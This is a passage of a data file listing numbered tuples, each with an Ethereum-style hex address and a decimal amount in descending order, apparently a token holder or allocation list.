(258, '0xa8bb0426560742705a744a1146c7aba588a1cde5', 1966.18961984),
(259, '0xb852a5f9b6e9c5e10ac2dce88530d465f33feb2f', 1950.0),
(260, '0x65d5f8e9d6a43ceeef0472a684b6bf78ab8ef56e', 1928.37843171),
(261, '0x4398b458c8d1e57453fa73fea36cf6e0d3105aa9', 1926.267066),
(262, '0x8791091ada8a737f2c3347987770acf416ad282e', 1915.0),
(263, '0xab6f2eaf6ed336ec2bb7390364f104cd9941ed50', 1881.475),
(264, '0x6556bc79ca5ef2eaf44e5b4edaf932a6b6ed350c', 1879.48042539),
(265, '0x06d19010f1e104ab812de0bcfaee291ee5214b5f', 1857.68837241),
(266, '0x792da967bcb65933e3a4d09096142692159e06c3', 1851.10916332),
(267, '0xd6dd81eec61100e25b31a1ee8726e14d72673f82', 1845.60913995),
(268, '0xbed23b3be2706c792612516452222ead9a83ce7c', 1844.31292029),
(269, '0xd37ad3222c1042d3cc919f87e2edea9db3917c10', 1826.70428487),
(270, '0x530d92dfb5caa11347f26ee741910dee6eed3208', 1816.01620561),
(271, '0x73d0db3a1af5fae63ecec7515af0b13b2fc80e45', 1801.316471),
(272, '0x5cd7c6de1c486ecc07cabc09298e801021d55b87', 1800.0),
(273, '0x4ca9511af821bee15015898caa03c38d4834d515', 1750.17011496),
(274, '0x68a3e00c8efbf8c07392116e2c171788f8d8be8a', 1749.75),
(275, '0xbdbda14a6a4240f968c5abf54254ee3e8f13da5c', 1736.50016153),
(276, '0x82dd6d3a2a0790bab2348a3b3cbc1842ef704ef6', 1727.09337617),
(277, '0xbe6acc2382211fade80a0aaf53bc11671cf19db6', 1725.52675776),
(278, '0xb9a7440e9b68ec64cae8bca150af04f6449cce84', 1725.28837675),
(279, '0xb04915709cfb68da5cb82f23e8b6d8fdaa21725c', 1717.84971085),
(280, '0xf51fa6166221b1f5dabcd175e08da127fa774c65', 1702.67264363),
(281, '0x56b225130564e15724b7135ce7263582ee368fa7', 1700.91636396),
(282, '0x33a3491f0bd8b800034994c1ea8d8b9728d0cf4a', 1698.19226687),
(283, '0xd95c23b49a85996a0e9e5e6d8449de5dbaacb3e8', 1697.1678156),
(284, '0x2895730bd3725084c91a07f25786baac644851a2', 1691.06846962),
(285, '0x6dcd449bd5fa61eaf835da90e60e36a059643998', 1683.91614566),
(286, '0xe138b6ad806364709fee8ecf02cfb2050aea6e17', 1655.46380636),
(287, '0xfc88677dfa4522e13847f3fc098884b31c870f34', 1653.37038108),
(288, '0xcb9c41f06333ce619b1350278dd9fab8c32d9548', 1633.38767837),
(289, '0xebd76aa221968b8ba9cdd6e6b4dbb889140088a3', 1622.36750214),
(290, '0xd1e1cb24961d43d6cc25dc001b6332d6fa67888c', 1613.72192066),
(291, '0x1fb5ab02b67be98f78506dc3f9de32c81a447307', 1602.27),
(292, '0x56f1d6d5e77661e1ca10d270f6c8d4ec45ceea7e', 1601.39211002),
(293, '0xc47a0a1b2ac098b6453869389e7c8471d9d88b37', 1600.29479316),
(294, '0x3906842e00abf96cc58300bec49124e6a36a46db', 1600.0),
(295, '0xe75ea07e4b90e46e13c37644138aa99ec69020ae', 1586.63167658),
(296, '0xfcd6a571fbd33582fa48b032352675221f92b88b', 1580.0),
(297, '0x5f17f1fae4b77da30a4eade968eb8b88396bc8e0', 1554.0),
(298, '0x868d6c0f9fe68061d5105937d1296b5725c00546', 1550.55642318),
(299, '0x8d2a9cc676553cfc007311b85ffc7c7957ffc33d', 1550.0),
(300, '0xf8daf929660d3548c80f3e81c9ab5b5122a5fb1e', 1546.21607696),
(301, '0x7381d09a8bde146c2472500203fd924fac0669a9', 1543.0),
(302, '0x293be9563bffcd50bbc29b8d87fc5c54f90732e1', 1507.77648525),
(303, '0xd65d33ba85f81c7c580195bc52672754ff3e202a', 1500.58293793),
(304, '0xfcddbc6fe38d609fab54f5f1ea8de7f710382aff', 1500.13168187),
(305, '0x390365cef67dae207db323496d24f643dd3ae581', 1500.0),
(306, '0x810e096dda9ae3ae2b55a9c45068f9fe8eeea6db', 1500.0),
(307, '0xeed22a02b5802b3b0187c221a87186a9450f2f89', 1498.0),
(308, '0x54f8f9ed083ad1256012984fc9c3319830d2668d', 1494.64856757),
(309, '0x06b5fdeba75494506c2d42aae1fc6afaefb094b5', 1490.66773821),
(310, '0x10e482d9fbc7ce353aa442444d25891a42c9626d', 1490.08776836),
(311, '0x7fb0115a09ec231d7d78440db52e5a1779116496', 1469.33957319),
(312, '0x55dd9b279dd99a95d763f9f5558abd5c9e9096c2', 1464.51379448),
(313, '0xf76350a77a2b2a34395d3f50dd5c1f4ea2e7d6da', 1461.22126967),
(314, '0x99a8220874c0ca868eb628b92be11375ccef11d8', 1455.54228512),
(315, '0x213c861bd0f02b1d10bdccf228bee18c124a77a2', 1450.61338788),
(316, '0xb746aed479f18287dc8fc202fe06f25f1a0a60ae', 1450.0),
(317, '0xca13b8e623bab51513c87089dc0a43b8fc1c4733', 1445.32585509),
(318, '0x09d9421452602b6dd20865578c7c455d97b28fc5', 1440.87683665),
(319, '0x093a3eb5c54722ccbb2cfbffcdb5b63c82f24218', 1433.89014314),
(320, '0xbc60aa031a9f34bd7992c99eae5e2c4dd1b5dbc3', 1416.48668057),
(321, '0x8cc179fb0473fb6473a2e28b290c79a06e39db2d', 1413.0),
(322, '0x6cbf9051661319a7717813a7d0cd23b969ba40dc', 1400.0),
(323, '0x7c2583ba2d3867ae5e02acbc099715479f18b144', 1396.69980583),
(324, '0x63302690155cf9c2714e9a1631e3ed140ed2fb7d', 1390.82022925),
(325, '0x9e1b48c6943e54871b244f097aaf0d13f6a64060', 1388.32146311),
(326, '0x98b155d9a42791ce475acc336ae348a72b2e8714', 1380.97285537),
(327, '0x3e000c703517e6c4abc0e8f469f2b671936325cc', 1368.21083585),
(328, '0x9567be7ca71b0f5a0a9aa1ecb943b60a00a98398', 1358.00456328),
(329, '0x9b3862c03f57b0ad4909937664d7bdef2ef4b33c', 1350.0),
(330, '0x01612d2e5ccae8e588d476bd09df7185cdf4f7e4', 1348.08),
(331, '0x603aa0ebe2fcef3fadee43cc1d949a583db8f185', 1340.09282961),
(332, '0x61213ddd3cc0fba8ac431351cf9f2103ab74fd8e', 1331.55),
(333, '0x47ddaafb9c8d72c44e0e4278b57a22ba7494e81a', 1325.42781379),
(334, '0xecedc580bb05e2399cb4f8aa53b4649fbce3dceb', 1312.995),
(335, '0x50c95c94bb5fa3aa2f5b340fe6ac02ac6224cea7', 1310.68876988),
(336, '0xc3fe157d4ab849cc9b321060169ba6a81f0a152e', 1309.66025939),
(337, '0xce0a7a2797fa84fc21ef114e82c84fe4ef7489f4', 1300.68854926),
(338, '0xa1aa3b553710b4b2ccdcc9b0cb07bb59a89fd000', 1285.04660069),
(339, '0x5c869c7bf5e3836b7d4ffff67eba5be9b84ec723', 1284.0565207),
(340, '0xf8f19bd1555392f1db4dd2588e68b671e5e17b1a', 1277.7834617),
(341, '0xe55f19d6eb88ce99181e70b823cd4470e8e6df62', 1275.91903769),
(342, '0xff09a75c527e2b327fac9594327884637778755a', 1273.15915947),
(343, '0x5abe7331334997770ac5d2be3d016d70bbb0ae73', 1269.87491481),
(344, '0x38a6a3f769857cb6db04406d9f6c9604ee8e54df', 1263.48673227),
(345, '0x5658e10bd669a89e03b7ac8dfe38b2af613b3818', 1261.0),
(346, '0x77ba6b59e27dff8fac459b6481b835c268898ef6', 1254.10509008),
(347, '0x5687de7f326f79a420fb0aeed2e239e7b29372ee', 1251.4987195),
(348, '0x3584efbb3dab1d249c635e53305b1fba77c723a5', 1241.78399261),
(349, '0x61b51970ff5164d42d797a4972bdd64dcd09ea17', 1221.30997563),
(350, '0xb093ecd91d6be5e2e280cd713509db10cbaa390c', 1215.49624202),
(351, '0x8f7501ddac037bdb19d996f22cd8891a44ff0e08', 1196.21050424),
(352, '0x44fcbc53d0fa5d0b0fb7c03056348f8582b3ef8e', 1194.61318781),
(353, '0x2a61cef0c52492d4c50b75ab50f65e649246c986', 1192.1801945),
(354, '0x1c5af82a5edf00a66e1308a365808f353cb264c3', 1190.20679198),
(355, '0xd28e65a2fd9166cbbcbf8d9225d33f1bdba5fc3a', 1189.80592373),
(356, '0x88b54cade5ee85a671c2b7d8cc6cb1e88ceac4d4', 1187.33296808),
(357, '0xf02158a00e9fdea27503402ced89f871be60fc4a', 1185.80960114),
(358, '0xd4fb8d6000dc4f9520c53822f652ccf9efb5aa76', 1183.0),
(359, '0x0c1add8e9a6d613f814c3a9b2b8e276652bf5383', 1182.82461829),
(360, '0xc5715394eecfb103aacba9b7db27f0fd3676721e', 1182.548),
(361, '0x22b39f83bcca76bbb288633fed196c2a05c23e7b', 1176.35664434),
(362, '0xb04adc19e5cf482b0ff8d32fc798737f172363ae', 1159.27356219),
(363, '0x274f3c32c90517975e29dfc209a23f315c1e5fc7', 1158.9321709),
(364, '0xd5cc561b312f155331c320380be2d2e1dc798cb1', 1154.89779421),
(365, '0x4fd5a56ffb130665bf6b0f41651a8976c1eb8c26', 1151.99985887),
(366, '0x08168b5b9e621d5c3fd7aa60537afaff77c5b365', 1151.48671892),
(367, '0xfbea6ec73eb8554326e950ab49aa7462db6eddd9', 1150.0),
(368, '0xc969a64be22f2b2fa4cacd3b824f47a029ee98d0', 1140.72247116),
(369, '0xe1c608ae303c8ebb40ecfb2f3ca4341d21ed76b0', 1138.54563814),
(370, '0x2674ef196c99c4b0119aaa063c6e82d6ac11d2ab', 1135.69664585),
(371, '0xec8af40445f6d4169b75623854350c7711f47ec3', 1126.3566419),
(372, '0x66ad1860361ab922e589488bbd250abbb0f793ab', 1124.68251639),
(373, '0x3fb27837240742b813801ba1405a1ab196896ace', 1124.44081731),
(374, '0xe1fbc646c5de68b41433c8da96f03bfed9a05f2b', 1112.03077119),
(375, '0x2cf58eeb9369ca0d1ca2690d057661514a84ef91', 1105.62362963),
(376, '0x9b5f8600ab412717fffb026c24af311ab0bc6e75', 1100.23949262),
(377, '0xe6e27f75a13307c3fe4a8d45c09de9c311eea4a4', 1100.0),
(378, '0x0dde2e438d72e54c8d2e81f1bf51f42646e6c467', 1077.47582494),
(379, '0x97be37418a0037c88df512760d8ab0c795217b37', 1072.52035127),
(380, '0x8bcba7e64f9ab002c765cff2a291a85a8c8837a0', 1070.914),
(381, '0x19a668540a39cf9bc6b6809be129f57984a0d2b0', 1070.08449403),
(382, '0x1d0e97dbe5bfb1ecaa0529fb7be550962f00aef8', 1053.24294112),
(383, '0x35d28772130c325403b5ed3cc591368f3baa8250', 1052.17580722),
(384, '0x2d7fb51a4fd377c119083c6dbeec6215f752487b', 1050.46960767),
(385, '0x3397546a133d33550a74c53e0bf9e187a6c1e2b9', 1032.4988451),
(386, '0x688caee63356db8d64b50ebacb65998e97c1a15b', 1032.31614615),
(387, '0xa534eb5d9258daf68aa938bfb0b5a6ad65a812dc', 1031.69265859),
(388, '0x9be96a6e861d2e5aff1fe0738bed664b6f0b543e', 1024.14448507),
(389, '0x57e2f7931928f06e576917ee135f382582ddb731', 1018.14571107),
(390, '0xef9b6304358ebb1d9c1ea479d863b43715301fcc', 1008.4108162),
(391, '0xfa3f6eccc6b48844a5d0e2d7b754e015c2cc1b8a', 1007.96372283),
(392, '0xe8a01b61f80130aefda985ee2e9c6899a57a17c8', 1007.41108173),
(393, '0x616e67e07435114696c6b7c9ff9ba2122017334e', 1001.25233091),
(394, '0x6445661084dfeec1d5367a6891f9e0eed72e5a40', 1000.0),
(395, '0xe1b5547977ad0e06b8fcd12ca7a6b14ebb264cba', 1000.0),
(396, '0xc890e1af5d52454a43ff7b65b0353b7425d6eec9', 1000.0),
(397, '0x7e1187fe78e404f1bc531a9776ae452efdb6dbfa', 1000.0),
(398, '0x86024750f069e7d38284d367dd6180c73151b9bc', 1000.0),
(399, '0xd7361740d623eef4c0b2be8ce17bedaf476860ab', 1000.0),
(400, '0x458De35E5bC76802862DA179767f48425944AaeB', 1000.0),
(401, '0x3dd55914bbab532bc0f797201a77b786f1f6fde8', 1000.0),
(402, '0x6bbe0a39d7d6911eb2e8bd57dcea2344d05baa19', 994.0),
(403, '0x70580ea14d98a53fd59376dc7e959f4a6129bb9b', 988.40803497),
(404, '0xe067573b0b00627fe21492f1b95e7955a482aa7a', 986.8),
(405, '0x933461c58998b5d272c66dff610abb0a7d335447', 985.0),
(406, '0x41319357e1abac14c7012626ab01992ffda57123', 980.53647924),
(407, '0x7ee86965a28f97857a8ce915f93c5aafc191588c', 967.554866),
(408, '0x311f42c91c710fa522d1edd282be431eac20113b', 962.5),
(409, '0x725ee6748639e6d49b46b7e2da358dc1f20a010f', 958.25583919),
(410, '0x3c132698d59927fe08cba433a41d08acc96c0edd', 950.36781379),
(411, '0x97eae5fd11d07f69bd36063f642ddd060dcf7b51', 948.11811858),
(412, '0xf9d4f18d1f8340921892e0cd9e6a9947bf586f06', 940.72920978),
(413, '0xee2a7b2c72217f6ebf0401dabb407c7a600d910f', 940.34195038),
(414, '0x191a2c442ce9687d8a297fe6ba474397eba4cbae', 939.58990534),
(415, '0x55e0fc46f8e5c31ad0bebcc74120d96cc3a9d049', 934.69),
(416, '0x312bebd03d86b9e51243fd6da8fe6856b8c3f125', 934.26340081),
(417, '0x66fced227cc9d1d9d8249fa3057a20e0eec5fa0c', 927.34181089),
(418, '0x1490afd73d6004484be7211715ea3efed9c2edf5', 918.78346583),
(419, '0xf0eeb3e983f68de2e6209065e7209521c6ca914b', 915.87382944),
(420, '0xbaacd4089f6199c2e7c8dc2887acd0b2cd2a408b', 910.78),
(421, '0x9f76deaaa948386cb2beb34ce01128c8e462eddd', 908.976346),
(422, '0x2c04ca26541eac234ca93d6fc0ff788fbd553066', 903.23413052),
(423, '0x7aa4296dd40093c232afb86630d4765b17a765e2', 899.99999998),
(424, '0x521b9f95e5b95c728e0f10dee1ad230682fe675a', 898.02948621),
(425, '0xd756d5567939745f79dc85b45f8bc4d59351db7f', 897.77),
(426, '0x90c0c5a1ece301f60b597de995f4438f3a3a48b5', 896.82957604),
(427, '0x97c469d23005d6f2633e55d157b8510132e4bf4a', 892.937),
(428, '0x9e2ed055bbf95ee42e7973975b9ee6561ce1354b', 891.93979603),
(429, '0x487b1a73012131818a9da18bf6f0d0fdf8ba1ffa', 888.91),
(430, '0x67165e1ea2002cd7cbb4df93e5a855ef3678712a', 886.50041915),
(431, '0xafaf9a165408737e11191393fe695c1ebc7a5429', 885.88612106),
(432, '0x7348ccd3e09f0bdd520afd7adf155e241ad4e1df', 875.10019123),
(433, '0xca2dd7616c04eae77465fb6f61ec5ef260ce6ae6', 873.40177645),
(434, '0xd2109241b164f49d0ecf8395ade96223abf611ac', 863.0),
(435, '0x79c5be8f4098208006c7940cf72dae71738b39b6', 861.46959019),
(436, '0x36efb17c234b47ec36be7402e0b8d7118ada550b', 860.74113538),
(437, '0x724c96cd00fd39da96b20b5ed8e6d628b690777e', 858.68870428),
(438, '0xdc7822ebbb7cc2d4ddae107ffe6b283df95a4c5d', 854.62047525),
(439, '0x12e24c2a9cbeaa80c5d7d7392ce70a056c2ebf90', 850.0),
(440, '0x363b5534fb8b5f615583c7329c9ca8ce6edaf6e6', 844.13404152),
(441, '0x8bd56a65149fefb254cdfa93a23cdc81608ff52a', 838.20801908),
(442, '0x0a758f9aaa89bd3a9d0d60303c704d81d4a68fcd', 835.58058245),
(443, '0x669124e9d08fd73bfc77430d196674421da59814', 832.25782529),
(444, '0xd8724afa95ec4eab1c2b7698af4c7c2647c8d445', 825.0),
(445, '0x68b516f10bd2e9b7c8d49c326a49e63d3f87ac53', 821.00794765),
(446, '0xdfaaa0e14b3326ef71aa2974952604b240e29683', 812.9298424),
(447, '0xc7558592a9abc27ce8e4572ea2ac7fee3682f4d1', 803.05886089),
(448, '0x492c2bab4c0aaa42b820028baf20931d61607244', 797.90513261),
(449, '0xdaa5a23321796eefb563bd6a970c1695cc1af22a', 797.25939834),
(450, '0xcf3c6af794693ed19104016a20b46405e9bfb9e7', 793.4304838),
(451, '0x9be48b877aa1d6f8c7616671c0c99f18155ea0e4', 793.28410304),
(452, '0x717b76ad962ab4c3fbe9c376060ae079b8e355fe', 789.87344133),
(453, '0xd0214b7e8a7821a5cb07024bc00d64ece8cc1067', 788.64463628),
(454, '0x3171e2f0a9bcba8c33895c84f22629dfa8de6d2a', 785.0),
(455, '0xc5b2c6f19fc6626f0257c85e4ccbf22702e624c4', 783.0),
(456, '0x1745f31f9dadd71b9033b46e5050ad1575405905', 779.40761839),
(457, '0x67ad01635b268e2407d467102f860ea262b91617', 772.87063854),
(458, '0x988251c12d6db307c1a9e93280d90b98215f585b', 748.0),
(459, '0x9172ff7884cefed19327adace9c470ef1796105c', 744.88710544),
(460, '0x9303b501e06aded924b038278ec70fe115260e28', 738.55971585),
(461, '0xa0c99817b63eabbd84ef35834efb8f087889f36a', 737.52321008),
(462, '0x65aebe262fd644fa5ad3d45f7910732b413f81a6', 732.04571428),
(463, '0xb9307de3a136c00b6e6980dfe4638df30f6df1f8', 713.8557364),
(464, '0x5e65355a033e3e3d931a2454c753b1e69c8bf45d', 713.16746673),
(465, '0x19b07734cd36d1f07de9520015586d9422965fcc', 709.76138718),
(466, '0x945452db86dcb75642093dae296e93270103bcf5', 704.05367541),
(467, '0x2e361f82edfc9debe8acaad20d8f75dcc56101b5', 703.79059042),
(468, '0xba350b4a84af3b8c3d50d11c8d080fa615127914', 701.67997643),
(469, '0x29a1ed06127d9e7588686837c559d3c94459f965', 700.53838058),
(470, '0xc893661d44a36f57cd25a2c0bcbd5e2773c17088', 700.0),
(471, '0x76100e93cedbd4fb7c2a585f82ef51c0b612ff06', 700.0),
(472, '0xc9e441e02863d07256739ecfc7add33a1edbf250', 700.0),
(473, '0x9a0474070bd71fcc84a364de4f8a8848f6c4f816', 698.83381477),
(474, '0x167e733de0861f0d61b179d3d1891e6b90587732', 696.47352584),
(475, '0xed53036721b299a5d8d766a75fb9e4ecf90d4038', 696.22323281),
(476, '0xe60b049dbfbd25231deb88d7f6c54e5a196b2450', 689.66344124),
(477, '0x78d4635ec2588de43585ca514e0ea0201c52f689', 688.36920856),
(478, '0xf790ffb2130509e5d66148fbaf1dacdcba2b7feb', 688.0),
(479, '0x351c378f2f7b32445e91e81696529e30c170e29c', 687.65948689),
(480, '0x7573ce09b52a6ba12254666bb897dc3d5620736a', 678.60509962),
(481, '0xe2e41b5154c56f8674c63985c2ef2199763b7779', 672.01679393),
(482, '0xed4c4aab2232319481745849f3406397bebaeaa2', 670.44136145),
(483, '0x81a9c098446c6b4a2a5e91d3bf147aa2c5a0cb55', 665.60402903),
(484, '0x59c559ee6ccb455798de147417c7415202522808', 665.0),
(485, '0x631789090ea8a2910d4dbb2bb5ec335304c35fc9', 664.24845394),
(486, '0x3e7b7134767c44aa7bed6c1a3b6b9da3ebd63a60', 654.51923641),
(487, '0x10D6Da02Cc4618C0843a625aeA2739BEE9473526', 650.35646201),
(488, '0xd4d5a8a75b9915f785229a94bbb74f4dfc646802', 650.02267112),
(489, '0x3750ecf5e0536d04dd3858173ab571a0dcbdf7e0', 644.66382662),
(490, '0x143f0552db48b37f733899897b5a52a4ea6da386', 637.915),
(491, '0xd6388ac51092d758e5eb9c6602d27f21c3609dd0', 635.0),
(492, '0x4b14511029f4cb359f67a6f78e375c8cf7a99f2e', 634.68369772),
(493, '0x0c751e9b472448920e5208b79996e94465cee695', 634.0),
(494, '0xf6f56cdf5ff5faafbfd4cc78f88e4adcc9f7a045', 629.72130776),
(495, '0xbb6c5713119d7dfdb09188d5944b9258f4f408d8', 629.01329897),
(496, '0x3b18dcde59d6535f78e8cf4bea8a4318c0abaef1', 627.43729736),
(497, '0xe0234c374ad613ef04749d1be16ef713ab78ea0c', 627.29769363),
(498, '0x706affb793c634f66891e9444233ff96f2ca761f', 624.57678672),
(499, '0xfa4d3b1183b6a1453a99cb5c60f9f28de12aae7d', 620.6695672),
(500, '0x1262c73929d0d6759203fd3090f3a8a171ddf66a', 619.00668719),
(501, '0x2b2ed20bd432c91a2ff8a8e21453f4bfeb56cd08', 618.85601141),
(502, '0x3745f444229eb1f1b154718aa078842be0bffda6', 617.5),
(503, '0x8fa52df588036144de2bbf76582e653b24fcc401', 614.33512937),
(504, '0xf20375561dddcdc058aeed6da3cdfdd06caeb9e8', 608.53038628),
(505, '0xf3f2ed3d1790e535d364b152392f31ca0bdbf966', 607.62911227),
(506, '0x35918dc7067aa514577e35635b1e596a3c6b23e8', 606.24279554),
(507, '0x4cc8283bd9653a9d1b23823d0821f959f01126dc', 606.18666491),
(508, '0x97d0ac717310060dd93eda2c92ad5696b95ea8c9', 606.00774989),
(509, '0x6c5112e3c4c93ca1c26a804865fde50a68b73f98', 600.0),
(510, '0x75c83ff347218949d6bee8d80ed11210b958d737', 600.0),
(511, '0x5c2e85d6fa005ba1ffbddbf05ceafaba26703f21', 600.0),
(512, '0xe7f4413125b53714b415a73b3bf212a84e703816', 599.60413307),
(513, '0x190b7f50fe3cb11c62681000c28aa591dfd7924c', 598.9),
(514, '0x24f7b5eaa0e9e3c16c70766c4f110b1268b0d1bb', 594.60112132),
(515, '0xfd14ed114ce59d08280bb83555c21c54e63a65d5', 592.68605301),
(516, '0x1c46facafd2589999494793aeb68597fddde0500', 585.21591206),
(517, '0x313a64abf5b503abc71bb8e7140c4314cd20d94e', 583.98128994),
(518, '0xcbb91a5cd898c69e9fa33c062b787eb68c8fec6a', 580.07599596),
(519, '0x3d3533bcb8edfdfd1d430747c487c3d4e9f6bb17', 579.18863499),
(520, '0xf43f5d57ad68cbc2083fa013bd25d82826dcc6d6', 578.66466137),
(521, '0x1fc12b84c542704788313d98ed7543b7c8afd886', 577.64549786),
(522, '0xbcc9399b28fda1d9a050174f792d85134af36681', 577.31445317),
(523, '0x8078660eb8f4fca66a37d0fb9a8aa2ea0c55b1c4', 577.01699667),
(524, '0xbb0a14f44d296693f968e21fc9dcfd77d8071104', 576.6980176),
(525, '0xe3e9a788dad5a631db6458b495a41a513cc4267c', 572.70862877),
(526, '0x5c0f7651dd7fe5e1364daa7c782225fa78c5bd25', 572.0),
(527, '0xc0eddbdb8c6c0c33189e3a43fb5144c42a56d220', 571.42857142),
(528, '0x1cf9f27c7e4754ffec8b5a0a07893c866205b09b', 568.62404966),
(529, '0xa3d095d33ef8395f48b12956d2f4f9d73a37bb73', 566.81030449),
(530, '0x997fd8c1eaf2b388b5a584c05ef538aa76dcc9c3', 565.19079021),
(531, '0xab322d4e885e19701a5041a1b7bf82576cd66fd7', 562.66000854),
(532, '0x38255e460b54d795a3cdb27fed963acd303a5b1d', 556.71448842),
(533, '0x4a029d8f89dcead5876d9a04a8982da83c59cfa4', 555.3977),
(534, '0xee07982f851f4726031b4bedb51d1dbbb8b406ae', 554.96918924),
(535, '0x40cb16980dec30df798e7d34336ba6da4de510f6', 554.35822956),
(536, '0xb95ec7e3b442c3882ae071af26c868dfbefbba31', 553.70242251),
(537, '0x5b369c274f41ac281581005057d1619a384124ac', 552.26048626),
(538, '0xdb20af7cf935dd164be14b921e63686b733bd33e', 550.0),
(539, '0x5496f6f34f7bd669e5e9e5975b3f46f7f2b94c3d', 547.646949),
(540, '0x5dd25b4d3de1df98882a2b4802595ec6d2561e63', 545.46623471),
(541, '0x9f5f1dfdcfcf2a372ed8b3cda388d27c664454c1', 544.72422174),
(542, '0x0c75aacdf13deee4a45e17337b5a499a3c86903c', 544.42923369),
(543, '0xb3336843a629e98e36e2c70ddcb027af0d329233', 541.12975583),
(544, '0xa0920a0414746e2ae92acd7a1199dc13265cbf0f', 536.59972062),
(545, '0x3039c25b2f7395648c9c484c2f45803ff737a96e', 535.32221677),
(546, '0xe86fee1bea5144bbf77ff19fe573de0a6832d804', 532.65583732),
(547, '0x2a8f3ad1a15d57f56b5788ee9c91565c4a3d3c2e', 529.21963289),
(548, '0xfe31fa48f003b95b8c225c7e376b431d0adb4076', 528.57324249),
(549, '0x313e94b807d8b0b05aa0ea2a61f9f9534af1952e', 528.0),
(550, '0xec2e45ea3f784fb35056b3e7f652ea007df36815', 527.36357208),
(551, '0xdf015905263772958598d82fefd6fe4f4bd96100', 526.7211243),
(552, '0x37a9066b0268e0ba405b87813d8c7fd65416e46a', 525.39283326),
(553, '0x2f21da242843d435786b792ba10dc53fd50d0d4a', 525.34352726),
(554, '0xe01b72f825ca66aa1a058c19ad062dfa76f833da', 524.08182163),
(555, '0xccaabe7d8ac33d3d1b2d6f144a38cf722ae83baf', 523.79631279),
(556, '0x7564d1c2aa49c01a5df1ce597c3d63e480b88102', 523.37890499),
(557, '0xa8b8ea4c083890833f24817b4657888431486444', 518.04747556),
(558, '0xc09d6e62f919d0c856f0a144073b85ac8a9e5c75', 511.46935673),
(559, '0xa7b72a56f3f7d18707d7d1c20ed06909fabf40e8', 510.10761808),
(560, '0x9b5487b731eefcc81a9dfab4b4634e6faad7e5b6', 510.0),
(561, '0x00a2543d6ec4b50adf8deac8ce5bb9fdf833e1bf', 509.73032979),
(562, '0x8f7131da7c374566ad3084049d4e1806ed183a27', 509.61559054),
(563, '0xa742bed9cb152516bc4718cc8298e4fd2bce40db', 507.931752),
(564, '0xaa035e3c97d006fae171cd9b4d4f1c86aaa8d6c7', 507.9160869),
(565, '0x91ea62106ef05d240d3e111eb6297e8a1a228359', 507.07492204),
(566, '0x0985224a811e65c235dbf4a2c2117712aabe4e39', 504.54),
(567, '0x2958db51a0b4c458d0aa183e8cfb4f2e95cf6e75', 503.57880696),
(568, '0xf14be3662fe4c9215c27698166759db6967de94f', 502.85806761),
(569, '0x1a11f316bafb95e7ce3f4ae2cbce2a9b96ade7dc', 502.85669886),
(570, '0x02349f669910c5531ac5da683c276a6553d94ca2', 501.446),
(571, '0xa08dc26fe4c3ad3c85583bf677a96193ae5c0e9c', 500.448),
(572, '0xfcc5980dd3dfc672312ab78c5cd30c3c23fbaf9c', 500.33220658),
(573, '0x891d32ccb05d38018810bb07133fe9a9f2bf28d9', 500.16119837),
(574, '0x29a3100a92206477fd4e28ece3bebc55becd9cd7', 500.0),
(575, '0xc8f876836db93986a6e05ab3a1056817dd824464', 500.0),
(576, '0x6849ea4a3ff921ec76cd3fa978773357f4d1d64c', 500.0),
(577, '0x1111011110b787d19f663f14191cc2e78aee2b00', 500.0),
(578, '0xc2a0f9f6423d20fdf500680f52b56a6f45683dca', 500.0),
(579, '0x19ae3e399d81f908a8c0b0f7b4c0c6babf999aaa', 500.0),
(580, '0xf0523201547d94ddb8125b43365dea3df5d23bcf', 500.0),
(581, '0xb17155acf86d6f144c61b7dd0cd473729f104d50', 500.0),
(582, '0xad3bf0298126e4f3fc23130788f9c0f0b1fffaa7', 499.83879613),
(583, '0xd5ec0b48826223bbdf8607b3e245db670f30641e', 497.47157382),
(584, '0x5f62d4e99b8d42fc871cb3211e6e1bc125386daa', 497.16777077),
(585, '0x991c1e4f989afae678a61e4ad957ef1e4d4f2f06', 496.32938416),
(586, '0x0d9a38241c2a251a4f07668ba81952c68e1743dd', 495.7),
(587, '0xf1a5a927721eb14279098e4fc40c9becc8ce8c97', 495.1322155),
(588, '0x86f8a1c372e7f16e648a3dfa377857c0a4297387', 493.2589),
(589, '0x99780923b0370c21a2b2d6894705b3c2f8d5ce32', 493.0),
(590, '0x8df2be7a96c49aefa0f1fb9424524f40f48bff3b', 491.84340057),
(591, '0x3e8cba29f0ff64e1b27b11c64e108218c6354ac4', 490.0),
(592, '0xc50d8687a78680f51da2d666a3f9e13251e7aba5', 489.56584172),
(593, '0x7677f2fee0da6c18532b79e4ddc37d932d79f785', 487.0),
(594, '0x673884a7258b6be7f174ada97f472976cc8b1aa2', 481.67226471),
(595, '0x4b1b1f8250b19bc22cd8b930a90b85621bd3ec58', 470.05799104),
(596, '0x3287b9136f5bfad539ac8f60299cfce2a2b74015', 469.53129026),
(597, '0x3f08af8a69e9247bf9475b2b000779f79a97b0be', 468.4839023),
(598, '0x51b36d1c511488351793e06514484f3f8caea0b3', 464.77613093),
(599, '0x1ae75e3e6b8efdbf3f98003fb0a9a9f47b21178d', 462.86318822),
(600, '0xb0a10e11a3b1b652044481787261cfee12214e57', 461.50770422),
(601, '0x11c7a1813bb63fcf2c7e8bbaaae313fba705f046', 458.63204584),
(602, '0x2490b4f7a3ec7db3a4e78b5c737d2177863ec70d', 458.60611514),
(603, '0x47ce55b6df2980d7c1ea3276f35ae7294e427ca0', 458.09384363),
(604, '0xc9022c09d2405bb015c707697885e672dc8a5007', 456.44066608),
(605, '0xd2e43c04f49aa41d00f491ddb2dd324de47d75c2', 455.04138134),
(606, '0x3d06dfd6416e8707cabb1bb9f116affc4d9521ee', 454.68379926),
(607, '0x8b04614cb99fb0386655130cdfe9a2648edcce42', 453.22898406),
(608, '0x8563195d5c7afa1f888d9b98a5cee1cfc9c872dd', 453.0255102),
(609, '0x02e03db268488716c161721663501014fa031250', 451.62516921),
(610, '0x052b93bab0972df16709ad4808265fbd1ca47320', 450.0),
(611, '0x695d1b61f09d07956af3f93d62aa79b1ab8fa29c', 448.92934758),
(612, '0xe5f77e129dac65b8b174cffd0fbbc31b62b458a8', 444.88278132),
(613, '0x260a10d59ea58c68dbad1422a734723f715a69fc', 444.81850569),
(614, '0x3cd874b77ec4feca32efab84f59672ad9737d743', 442.82887114),
(615, '0x8afce0b7ca212fcd4fd9ea54749c6c48e715c60f', 442.6284946),
(616, '0xce04998e4e8f07e7ac521a136aa6dc69776e8d79', 437.48713249),
(617, '0xf39982387cf7f904aef48663bed114e4125ee515', 437.04695017),
(618, '0x2a34425ee3dc31a190050c50bd2cf9611c4a1497', 436.15728255),
(619, '0xecd050d293610d034ba0191a4e62cbe2de750c3a', 434.15302273),
